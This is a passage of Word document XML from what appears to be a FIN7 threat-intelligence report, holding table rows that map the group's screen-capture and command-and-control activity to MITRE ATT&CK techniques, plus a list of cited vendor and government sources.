              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00E02B5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72C47A31" w14:textId="12895BD0" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D6859">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D6859">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1113 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D6859">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7690AE7F" w14:textId="4108A0A5" w:rsidR="004F28B4" w:rsidRDefault="0081790D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62047EA5" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="579E553F" w14:textId="3E657F91" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2783325A" w14:textId="5F618E34" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00B4128B" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2F760B" w14:textId="7CCB49F4" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="006559B2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00770F8D" w:rsidRPr="00B857D7" w14:paraId="119B82C8" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F9496D" w14:textId="39F7C87E" w:rsidR="00770F8D" w:rsidRDefault="003B2688" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76827964" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00B857D7" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0677E446" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00B857D7" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1573</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="407D0282" w14:textId="1C87BFA6" w:rsidR="00770F8D" w:rsidRDefault="0081790D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D60E18" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00B857D7" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CE77288" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00B857D7" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46218DA5" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00B857D7" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1043BC4D" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00B857D7" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00D71F78" w14:paraId="22AFC64B" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0388713B" w14:textId="32EEC684" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="003B2688" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="246C98F6" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D71F78">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D71F78">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D71F78">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7534D581" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D71F78">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D71F78">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06EFA24A" w14:textId="054B0175" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="0081790D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163E84B6" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17E17FAC" w14:textId="4198B71D" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="003A5B0D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32319E11" w14:textId="7DB9D493" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="003A5B0D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3489B9F5" w14:textId="3C804548" w:rsidR="004F28B4" w:rsidRPr="00D71F78" w:rsidRDefault="003A5B0D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="106"/>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="7D622C4F" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756695D5" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8EFB6B" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37503F91" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA375B8" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A50552D" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67DE7DBF" w14:textId="29838AE5" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45E7D7BB" w14:textId="1182F430" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A4BEA23" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="482BD7BE" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="0077286F" w:rsidRDefault="005369E4" w:rsidP="005369E4"/>
    <w:p w14:paraId="55006877" w14:textId="77777777" w:rsidR="005369E4" w:rsidRPr="00C94979" w:rsidRDefault="005369E4" w:rsidP="005369E4"/>
    <w:p w14:paraId="0BB49246" w14:textId="77777777" w:rsidR="005369E4" w:rsidRDefault="005369E4" w:rsidP="005369E4">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37112298" w14:textId="4875E5C6" w:rsidR="005369E4" w:rsidRDefault="00911F80" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>FIN7 Evolution and the Phishing LNK | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCC467" w14:textId="15E06E89" w:rsidR="00911F80" w:rsidRDefault="00911F80" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Microsoft Word - fact_sheet_how_fin7_attacked_and_stole_data_0 (justice.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [???]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD489F" w14:textId="23EA3E14" w:rsidR="00911F80" w:rsidRDefault="00911F80" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">FIN7 Revisited: Inside Astra Panel and </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SQLRat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Malware | Flashpoint</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C5AFB" w14:textId="6EBD5A67" w:rsidR="00911F80" w:rsidRDefault="00911F80" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>eSentire</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> | Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71421EFF" w14:textId="54EB89CE" w:rsidR="00911F80" w:rsidRDefault="00911F80" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CARBON SPIDER Embraces Big Game Hunting, Part 1 | CrowdStrike</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B127D99" w14:textId="14ACA886" w:rsidR="006D7B14" w:rsidRDefault="006D7B14" w:rsidP="00065ED3">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>FIN7, GOLD NIAGARA, ITG14, Carbon Spider, Group G0046 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9E13D" w14:textId="7E465207" w:rsidR="00314B8C" w:rsidRDefault="00314B8C" w:rsidP="00065ED3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Fin7: An insight into the threat actor group’s </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>high profile</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> attacks | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cyware</w:t>
        </w:r>
